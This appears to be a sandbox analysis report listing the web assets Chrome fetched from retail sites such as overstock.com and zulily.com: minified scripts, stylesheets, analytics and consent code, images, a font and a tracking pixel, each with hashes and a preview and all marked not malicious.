                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32117)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51984
                                                                                                                                                                                    Entropy (8bit):5.4192491243703405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:JIF0sxaJJciEVY+7ODTPLhRM8WVQpESqQKsxtLQzavRsLadl0W8M5F4H:ahItZrMRWpEWHQKiqKH
                                                                                                                                                                                    MD5:DB49357F923EC899C9EF90B7DEF907B8
                                                                                                                                                                                    SHA1:480D28152D77EAB20F5992EC0AB5AF15960FFC91
                                                                                                                                                                                    SHA-256:80E528BE853EAC23AF2454534897CA9536B1D3D04AA043B042F34879A3C111C8
                                                                                                                                                                                    SHA-512:88607E0B9619FA59D47B036F0BDF571CD996701774BD7AAF075B63C38590FFD6315551CF361126D4F7E5379A6D635FE3C11283D9560419040254CD217BC544ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var t=function(t){var e={exports:{}};return t.call(e.exports,e,e.exports),e.exports},e=function(t){return function(){var e=t.apply(this,arguments);return new Promise((function(t,r){function n(i,o){try{var a=e[i](o),s=a.value}catch(t){return void r(t)}if(!a.done)return Promise.resolve(s).then((function(t){n("next",t)}),(function(t){n("throw",t)}));t(s)}return n("next")}))}},r=function(t){return t&&t.__esModule?t:{default:t}},n=t((function(t){var e={}.toString;t.exports=function(t){return e.call(t).slice(8,-1)}})),i=t((function(t){var e=t.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")();"number"==typeof __g&&(__g=e)})),o=t((function(t){var e="__core-js_shared__",r=i[e]||(i[e]={});t.exports=function(t){return r[t]||(r[t]={})}})),a=t((function(t){var e=0,r=Math.random();t.exports=function(t){return"Symbol(".concat(void 0===t?"":t,")_",(++e+r).toString(36))}})),s=t((function(t){var e=o("wks"),r=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):469533
                                                                                                                                                                                    Entropy (8bit):5.626574047300211
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:c6OqZ5D42HkKcsSaSMQhJ7qUCMkFONAErJ:cSc0SBhJ7q/Fu
                                                                                                                                                                                    MD5:4560E2AD27A3CE351AE67930EB51AE60
                                                                                                                                                                                    SHA1:A83DA6C0639C662541F3F197DBA9CF45BB07A8EB
                                                                                                                                                                                    SHA-256:19D829E9C01A0325272374BE22F218C6660D73B58E6B1E6C37D9A41EF2E01937
                                                                                                                                                                                    SHA-512:A10C29604AC0E21656E4221C027928CDAF8975036200D7A098F9CFD07579B4AB7B4AB40A0EEC548E825C5B5AEA0A608BB87A9E53E971D60BEC9F234F8B877D63
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(e){function t(t){for(var n,a,s=t[0],c=t[1],l=t[2],u=0,p=[];u<s.length;u++)a=s[u],i[a]&&p.push(i[a][0]),i[a]=0;for(n in c)Object.prototype.hasOwnProperty.call(c,n)&&(e[n]=c[n]);for(d&&d(t);p.length;)p.shift()();return o.push.apply(o,l||[]),r()}function r(){for(var e,t=0;t<o.length;t++){for(var r=o[t],n=!0,s=1;s<r.length;s++){var c=r[s];0!==i[c]&&(n=!1)}n&&(o.splice(t--,1),e=a(a.s=r[0]))}return e}var n={},i={2:0},o=[];function a(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,a),r.l=!0,r.exports}a.m=e,a.c=n,a.d=function(e,t,r){a.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},a.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},a.t=function(e,t){if(1&t&&(e=a(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(a.r(r),Object.defineProperty(r,"default
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):69
                                                                                                                                                                                    Entropy (8bit):4.087898688625098
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YUzIwCfroKH9cSLJfRiI2HLCf6n:YUzjCfroK24tRt2rCf6
                                                                                                                                                                                    MD5:2D964E8A700809EC78091E2C67F65CF9
                                                                                                                                                                                    SHA1:D7F3081BEE6E506DF8469C68B8F92575CA43EB74
                                                                                                                                                                                    SHA-256:B86851FE85765C4D90E9AF04BDD726F9F58002A0130E81F907B65DC88A25218F
                                                                                                                                                                                    SHA-512:F3B804985AE1DFF0D3419ED4ADF2BD72632E0DFE3BBE728FE7AF6CCC0E71EB02BF5585AB431A80CC4F42B3B054D48B19F90884737B8CF78EE89E96A5A0D8B36A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://api.tapc.art/capture-kit/?shopStore=&appId=CeeweiHh1L
                                                                                                                                                                                    Preview:{"qrCode":{"enabled":false},"mobileDownloadBanner":{"enabled":false}}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65460)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):111802
                                                                                                                                                                                    Entropy (8bit):5.268240482340551
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:UZBnKRIUgcLRO26jyoxhbpQORNnNfM7dAg4uO9tboCsf:UvKRi+kbSW/Wd5Csf
                                                                                                                                                                                    MD5:5B9D8BAA112D5D1FE1575BC547A2D11C
                                                                                                                                                                                    SHA1:017C071245A55242CFABDBB70CE8D3D628B7A18F
                                                                                                                                                                                    SHA-256:2E5AA81E02F13EB7E2376331A641BC0BDF3DCFBC769872074CC3134C3FC4D0E3
                                                                                                                                                                                    SHA-512:0642614B00E1CBC28F3F669CE9473D4528F151644D1702001B5503BB9FC3615DB7C77721BD4C652CB3D67E2D6CC8AC4600443D8E2F1B8494334DEF96539193F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js-agent.newrelic.com/nr-spa-1.265.1.min.js
                                                                                                                                                                                    Preview:/*! For license information please see nr-spa-1.265.1.min.js.LICENSE.txt */."use strict";(self["webpackChunk:NRBA-1.265.1.PROD"]=self["webpackChunk:NRBA-1.265.1.PROD"]||[]).push([[478],{7699:(e,t,i)=>{i.d(t,{I:()=>r,N:()=>s});const s=64e3,r=1e6},9527:(e,t,i)=>{i.d(t,{n:()=>c});var s=i(9422),r=i(4777),n=i(4624),a=i(2838),o=i(2614);class c extends r.J{constructor(e,t,i){super(i),this.endpoint=e,this.opts=t||{},this.started=!1,this.timeoutHandle=null,this.aborted=!1,this.harvesting=!1,this.harvest=new n.M(this.sharedContext),(0,a.Q)(this.unload.bind(this)),this.sharedContext?.ee.on(o.tS.RESET,(()=>this.runHarvest({forceNoRetry:!0})))}unload(){this.aborted||(this.opts.onUnload&&this.opts.onUnload(),this.runHarvest({unload:!0}))}startTimer(e,t){this.interval=e,this.started=!0,this.scheduleHarvest(null!=t?t:this.interval)}stopTimer(e=!1){this.aborted=e,this.started=!1,this.timeoutHandle&&clearTimeout(this.timeoutHandle)}scheduleHarvest(e,t){this.timeoutHandle||(null==e&&(e=this.interval),thi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2058
                                                                                                                                                                                    Entropy (8bit):7.179784050331811
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:OIl/XflBuIsUVUBNLuCXAeq5bgUyjkilIHvO5u7o:OIl/XCIsUSz5XAE34ilIyuk
                                                                                                                                                                                    MD5:9619408F51D766D99A8FFA1BAD8EFFF7
                                                                                                                                                                                    SHA1:B6A279E99B9DE3320957FD0D401E86540B7D7E07
                                                                                                                                                                                    SHA-256:CD78A7E96A7B4CFFDA0B45223FC792C35157D9E154A0949A5309EDDD9035386F
                                                                                                                                                                                    SHA-512:0B2EBB93B6FF7DA85F2EA68D6637A783D32276DAD19F0D66CC8F89159081256ADC8BB03617E8EDDF8736514D7A66EAED5E01B2AFD5B39268205E6C8E25313D57
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_6286131c-c7ea-4bf9-b6e6-47ae45dab31b.jpg?v=1729325107&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 r...P....*P.P.>1..B.!!.+.X ....fd......Cn.=.......D....h.|o....5Yv...=....'....w...T....Z!..Aw...w....H%b.g8....qn.h>.Y.C..k..V..q.e...p.lKj.h..Ur..;0...lkc..K..=.....\......Z...4......|:...Ln6............C.....vv......"....q.@......;G.Q&....H..7.%.n....M..p.~re..q..{..v..i..]..:K.}.B..).....D>.|...yu[.~j90..Fe%.Q.K...;......,.B.X..D..l._1u.{...".9#...W....6.....i^.O....@......\.G.H\..0~l).s.{:..2..w...10..w../.n...!,.'~./..S...#....4......?.-.E..r|..i.@...w.v..Eol....7f'...W.u.>s.....>..s..[.x...2..hG..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 37872, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):37872
                                                                                                                                                                                    Entropy (8bit):7.994594408975069
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:FFhAQ/YWkrvhVjS7cz/E5kvPz1mwwxtN9VcovlVWNUjLNWZEjVlsR89DERB:LhADrvh5S7cz/E5IPxmw8n9v3WS34Zyu
                                                                                                                                                                                    MD5:43873C6AC8CB9022FE7E75D4529E1590
                                                                                                                                                                                    SHA1:DC93327B2F0DC94B5F1DA0C30E04ACB829F33222
                                                                                                                                                                                    SHA-256:DF958499E3445A6554E61A372118192A3B13D7865EE2C8E0C8D28C2B4DD7E999
                                                                                                                                                                                    SHA-512:48BC78A42835E93F7ED923EB92102F719FD62BE6EADC4BF7B13B6E2FAE3E7FAADA949A86ED2BEFFC7A7FC2314CEEB52F8B218E036F29C8A8B1DE4A337FFF16CE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/t/70/assets/belltown-medium-webfont.woff2
                                                                                                                                                                                    Preview:wOF2...............x............................?FFTM..*..*..>.`..V.J..e.....@..?.6.$..H..f.. ..@..k..t?webf.[@.q.f....6..$...U.Q.0.~...&.x.}.rj.............ZR.c....$.2....g.j...F.T.."......L7.&..Uo.K.r..H....;..m-.?.D..H. .L"I..N....7.~,..dK7...9.O..)<.7.A.......A...{.I..,.9..)...r8.k.^.... ..l.]...]?K~..... .[. .dHV{.n..$...zv..#........E.%.Q.".Q.::..0W:#y...bF.!.$.K......+.?.....:..s..u.g.D...<.&..U'..L.0.N.Z`,.....j..2.AI...y..+.l..T&LR..Hs....@k5..[....N..#....b..K....q...6..E-..@..X.z.......a..[..*.v..fK...F.%.8......|'.~L"R.`.~..?./....L.K7.7o..wj....^...@.h.h.(.3...{./..x.i...vb.v&...k.nk:....,[..e.!^.........._.:|L.:..$..^..[.^f.N2o..8\. .......K&.'.....IG*C..t......r.i30.. .....lS@]...63..M(.."Q".-...9..D.Q1r...W...6..=.....[..-..9..........Y..wB.[....5v(1U@]...PY...}..u.Bj..4...".r..3X.@..,S..[UX..HI. ....o.U.^w....W.gfw.Y..".fv..l....B...`........ G...@J.RR5.4...j5W...sNs....j.....1IpI4../.}.._6{K{..Z...]k..r;...&.i.4.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1864)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1968
                                                                                                                                                                                    Entropy (8bit):5.047956374475141
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:lB3aJ/Lq+alYYX68WiRVz5CiGrgUYIT8J9OXkoJGfgpOz96FchL7GxNA2sJ8:lB3a1awrAVrsaQOZVexNZ+8
                                                                                                                                                                                    MD5:8486487D3FD41CA609AF702559946E2E
                                                                                                                                                                                    SHA1:5FF4077118AFEEC7287BC408313ADCF25E52EE05
                                                                                                                                                                                    SHA-256:42CAECE72C2DA9B9CCDCB9DAF06FD7FA08AC77D516261581C944DD8EEC305697
                                                                                                                                                                                    SHA-512:35702207FE0D9AB316F78BA3C774833991F0E434424B14EE842095E7A37DC8323692C817FED32BAF8F41C94E3D397199F309C633F8231BF10A677146739B9A27
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/product-message.css?v=64872734686806679821730157903
                                                                                                                                                                                    Preview:.product-message{display:block;visibility:visible;overflow:hidden;transition:visibility .6s,opacity .6s,max-height .6s,margin-top .6s;border-radius:4px;background-color:var(--bg-color);color:var(--text-color);pointer-events:auto}.product-message a{color:currentColor}.product-message p{margin-bottom:.5em}.product-message p:last-child{margin-bottom:0}.product-message .icon{flex:0 0 32px;align-self:flex-start;width:32px;height:32px;margin-inline-end:calc(4 * var(--space-unit))}.product-message__inner{display:inline-flex;align-items:center;margin-inline-end:28px}.product-message--out{visibility:hidden;opacity:0}.product-message__close{position:absolute;top:0;right:0;width:44px;height:44px}[dir=rtl] .product-message__close{right:auto;left:0}.product-message__close .icon{width:20px;height:20px;margin-inline-end:0;color:currentColor}.product-messages{z-index:5;top:50%;left:50%;transform:translate(-50%,-50%)}.product-messages .product-message{display:flex;min-width:275px;max-width:350px;paddin
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (15615)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16743
                                                                                                                                                                                    Entropy (8bit):5.456716758879567
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:FdWjlgyrZ4TGlvOcugdP7eOlOaQ9FWCzS99Dvukw3fvb+QKktIVy+GFdCVSx:aRuStvugdaOa/WN99DpwvvSrktIVyJBx
                                                                                                                                                                                    MD5:FFA66951FFCD1838E763A40AD9376DD0
                                                                                                                                                                                    SHA1:2F56C087AE3D0CE740D0882D487A2CAACC24E75C
                                                                                                                                                                                    SHA-256:03C06A89DC50576D784D066913178797F828BBE0E4364F5F1EF621241ECB0B51
                                                                                                                                                                                    SHA-512:0D4D648945C0A1D14B765615692A7341EAF4C8E60308AA0722068F42FE8693FC8253667A08814C9E70114FCFB679E7F33BE28EFCD2DF6E6756E210412B5D9416
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.734.chunk.03c06a89dc50576d784d066913178797f828bbe0e4364f5f1ef621241ecb0b51.js
                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[734],{7154:function(t){function e(){return t.exports=e=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])}return t},t.exports.__esModule=!0,t.exports.default=t.exports,e.apply(this,arguments)}t.exports=e,t.exports.__esModule=!0,t.exports.default=t.exports},6479:function(t,e,n){var r=n(7316);t.exports=function(t,e){if(null==t)return{};var n,o,a=r(t,e);if(Object.getOwnPropertySymbols){var l=Object.getOwnPropertySymbols(t);for(o=0;o<l.length;o++)n=l[o],e.indexOf(n)>=0||Object.prototype.propertyIsEnumerable.call(t,n)&&(a[n]=t[n])}return a},t.exports.__esModule=!0,t.exports.default=t.exports},7316:function(t){t.exports=function(t,e){if(null==t)return{};var n,r,o={},a=Object.keys(t);for(r=0;r<a.length;r++)n=a[r],e.indexOf(n)>=0||(o[n]=t[n]);return o},t.exports.__esModule=!0,t.exports.default=t.exports},4184:function(t,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):3.0950611313667666
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                    MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                    SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                    SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                    SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cs.gssprt.jp/yie/ld/cs?dspid=rtbhouse&uid=g0hMIegrEKzjHm5xeHMZm9yFfUyZVanf5JN19bo1aqE
                                                                                                                                                                                    Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (16448), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16448
                                                                                                                                                                                    Entropy (8bit):5.376075215221623
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Qk0DXtqs0waW1UVirVhqGK6jNM2tO0cR4wUGdF6As:b0DXtpIeEirHF25UGdi
                                                                                                                                                                                    MD5:271680D59F419A9CE34FDC0A32694547
                                                                                                                                                                                    SHA1:283AEBA466196A97BF7E5C36B0182EA100C8DF0E
                                                                                                                                                                                    SHA-256:A11FE64BE9430DF914190D60DE5A088D24D81262F6C9EB28CA47EF5FEE4CCD9A
                                                                                                                                                                                    SHA-512:CC4DF23E257D0E916CA760485800403D2420D4CDCDBE0580EF789778E88EA77CBEE1A7DAD740FFC20B8BFB01814462CEDE25DDD69F32EA66608B59D08827A37F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[247],{6247:function(e,t,n){var r=n(5318),i=n(8);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=r(n(3038)),l=n(8661),a=n(1611),u=r(n(5697)),d=function(e,t){if(!t&&e&&e.__esModule)return e;if(null===e||"object"!=i(e)&&"function"!=typeof e)return{default:e};var n=f(t);if(n&&n.has(e))return n.get(e);var r={__proto__:null},o=Object.defineProperty&&Object.getOwnPropertyDescriptor;for(var l in e)if("default"!==l&&{}.hasOwnProperty.call(e,l)){var a=o?Object.getOwnPropertyDescriptor(e,l):null;a&&(a.get||a.set)?Object.defineProperty(r,l,a):r[l]=e[l]}return r.default=e,n&&n.set(e,r),r}(n(8860)),s=r(n(4884)),c=n(2615),g=n(6584);function f(e){if("function"!=typeof WeakMap)return null;var t=new WeakMap,n=new WeakMap;return(f=function(e){return e?n:t})(e)}var v=function(e){var t,r,i,u,f,v,p,h,b,m,y,j,_,x,P,O,S,B,w,k,E,C,T,L,D,M,A,I,q,N,U,F,H,R,W,G,K,Q,V,X,z,J,Y,Z,$,ee,te,ne,re,ie,oe,le,ae,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5366)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5469
                                                                                                                                                                                    Entropy (8bit):5.009099993945532
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:54jCkYS1F4/CzEBEC80w1kxnHxvKiWAGwCeQH8:ajCkf1C/CdCI1kxHxyqVWH8
                                                                                                                                                                                    MD5:09DDD454EEBBA53B5E908686473366BD
                                                                                                                                                                                    SHA1:F0CF377AAC06DC9B248ADEC1EF64565786F18906
                                                                                                                                                                                    SHA-256:347712FF3379682874D2F1375E4A0F91E04DDC211B7E00F944F341E3498F1FEE
                                                                                                                                                                                    SHA-512:D849903E1835F31225BB609484B2EF0E9C3EE8B407E2656E4D944AEDBE6321CE11154E0AEA25FB40129E1CCE723C404127F9DF3AC977E6AE6D358FB1208E35B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/media-gallery.css?v=113955433480227947841730157903
                                                                                                                                                                                    Preview:.loading-spinner{position:absolute;top:calc(50% - 10px);right:calc(50% - 10px);width:20px;height:20px;transition:opacity .4s .3s;animation:spinner .6s linear infinite;border:2px solid rgb(var(--text-color));border-radius:50%;border-top-color:rgba(var(--bg-color))}.loading-spinner--out{transition-duration:0s;opacity:0}.revealable{visibility:hidden;opacity:0}.revealable.revealable--in{visibility:visible;transition:opacity .4s,visibility .4s;opacity:1}.media-gallery{--media-gap: calc(2 * var(--space-unit));--media-gutter: calc(4 * var(--space-unit))}.media-gallery__viewer{border:1px solid var(--gallery-border-color);background-color:var(--gallery-bg-color)}.media-viewer,.media-thumbs{overflow-x:scroll;scroll-snap-type:x mandatory;scrollbar-width:none}.media-viewer::-webkit-scrollbar,.media-thumbs::-webkit-scrollbar{display:none}.media-viewer__item,.media-thumbs__item{scroll-snap-align:start}.media-viewer__item:not(:last-child),.media-thumbs__item:not(:last-child){margin-inline-end:var(--m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):345510
                                                                                                                                                                                    Entropy (8bit):5.606661006061801
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:l4h1GbgBu2oAk2639cM8Gp/J2/rtu9BW24nOi:+hacu2oAnrAE3
                                                                                                                                                                                    MD5:646AEA9E583546ACBC128F86A28AF176
                                                                                                                                                                                    SHA1:CEDA08CB4142AA7AADC21FEC066E2AFBC22FC734
                                                                                                                                                                                    SHA-256:D4C365D283DD5A2E74C4F01C199FDFE78398DCDF984E23B39882CD4A8D0BBABD
                                                                                                                                                                                    SHA-512:24DE5C183BBC13E5B69693D8D401B50A53761D6A96C9D7530984DE092DF5B191596678FE45C2FAD2F55B1F15F71E8747ECD72A8C3741DBD58DB596DA64290044
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"7",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":25,"tag_id":111},{"function":"__ogt_ip_mark","priority":15,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":106},{"function":"__ogt_referral_exclusion","priority":15,"vtp_includeConditions":["list","overstock\\.com","paypal\\.com","ampproject","testing","staging","mrqa","sandbox","atlassian","dev","myshopify","tagassistant","mrbhargav","myregistrystaging"],"tag_id":108},{"function":"__ogt_dma","priority":15,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":109},{"function":"__ogt_1p_data_v2","priority":15,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityTy
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (14295)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):14345
                                                                                                                                                                                    Entropy (8bit):5.470148955001079
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:z+xdYmxjSeGZ2G+dAUMAwuPzifdgjB8yLCzVux9juRNXS8:zeYm9KNrUMAwmzadwxLCzVY9aRg8
                                                                                                                                                                                    MD5:6C7089520955559114DD8AE1C9155309
                                                                                                                                                                                    SHA1:6699A51084449EBE02F8D993D7A1CF319DC2E90A
                                                                                                                                                                                    SHA-256:17A3C5F33E798F7C361B47ED3A6FF3D7F6EC625BC39D4DA99E9A1D37A4C534BF
                                                                                                                                                                                    SHA-512:2FDAB7A90E032B2C30B39B319CF77DF4FAD6A1BC1E7B8D9EB7AC19D623291AAA9D1006E78FF93CF2CF9AF39BA0D6FA61FA8D10B0F3F8F4CEDE2F102B3D5C873F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(e){"use strict";const n={TRACKING_ACCEPTED:"trackingConsentAccepted",TRACKING_DECLINED:"trackingConsentDeclined",MARKETING_ACCEPTED:"firstPartyMarketingConsentAccepted",SALE_OF_DATA_ACCEPTED:"thirdPartyMarketingConsentAccepted",ANALYTICS_ACCEPTED:"analyticsConsentAccepted",PREFERENCES_ACCEPTED:"preferencesConsentAccepted",MARKETING_DECLINED:"firstPartyMarketingConsentDeclined",SALE_OF_DATA_DECLINED:"thirdPartyMarketingConsentDeclined",ANALYTICS_DECLINED:"analyticsConsentDeclined",PREFERENCES_DECLINED:"preferencesConsentDeclined",CONSENT_COLLECTED:"visitorConsentCollected",CONSENT_TRACKING_API_LOADED:"consentTrackingApiLoaded"},t="2.1",o={ACCEPTED:"yes",DECLINED:"no",NO_INTERACTION:"no_interaction",NO_VALUE:""},r={NO_VALUE:"",ACCEPTED:"1",DECLINED:"0"},c={PREFERENCES:"p",ANALYTICS:"a",MARKETING:"m",SALE_OF_DATA:"t"},i={MARKETING:"m",ANALYTICS:"a",PREFERENCES:"p",SALE_OF_DATA:"s"},a={MARKETING:"marketing",ANALYTICS:"analytics",PREFERENCES:"preferences",SALE_OF_DATA:"sale_of_dat
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1284
                                                                                                                                                                                    Entropy (8bit):6.388567360643692
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:MSTCIl/X2YlXWI2PU0jeOV7Wl8lBOChZkg4hJGLg9iLm:MfIl/XflTs6l8lrhZkPhJGL0b
                                                                                                                                                                                    MD5:AE71BEBC0C40BE321AAD5E6E6315081C
                                                                                                                                                                                    SHA1:4602BD9C3DBD83CF7A0149D728A6D52A09A8436C
                                                                                                                                                                                    SHA-256:DF47E3EB1CBAB0C8B4838A17F61A6FFD37810ED2787D671E8FDD599557F8628B
                                                                                                                                                                                    SHA-512:7A81D589DEECCF61BD390FFCC6FBE06994A6A4B33BB6CD491684179B1927410AF608FDFFF3227CE71F43B395950497CFC9A5806891E66908563A1C989ABFF7B1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_c131e91e-b724-4a22-914d-369607622eda.jpg?v=1729325186&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 l...p....*P.P.>1..B.!!.^$. ....hG..<.7LL.....X2..A..'..$..'.&.r<lP....b.6..v..b...^.Z,#..pf1_8....Fl..=VG.HE.)....h.............4i....#.'..z.|..O..s..@/.c..?.....l.&..*\..a....o.o9...q1._.v..?.4S}M.]46..t....(.l8L.E.?..".4S.....w-..=....&.:nh.kI.nu.^r...q.)...V..@..).3JE.Q#x_.+k|J...w...........Y.1"B.....9..<O.4..;.TM..O6.Y./..AQ.(....S.V,.VKf..>..{.....^.!....ol@...oiF........."....c.%....$sla......Q....K..{@.~P.F..L...0.V......UvY.....(..S.........6..M.......XX..adKc.x.Fk...h......H........!v...
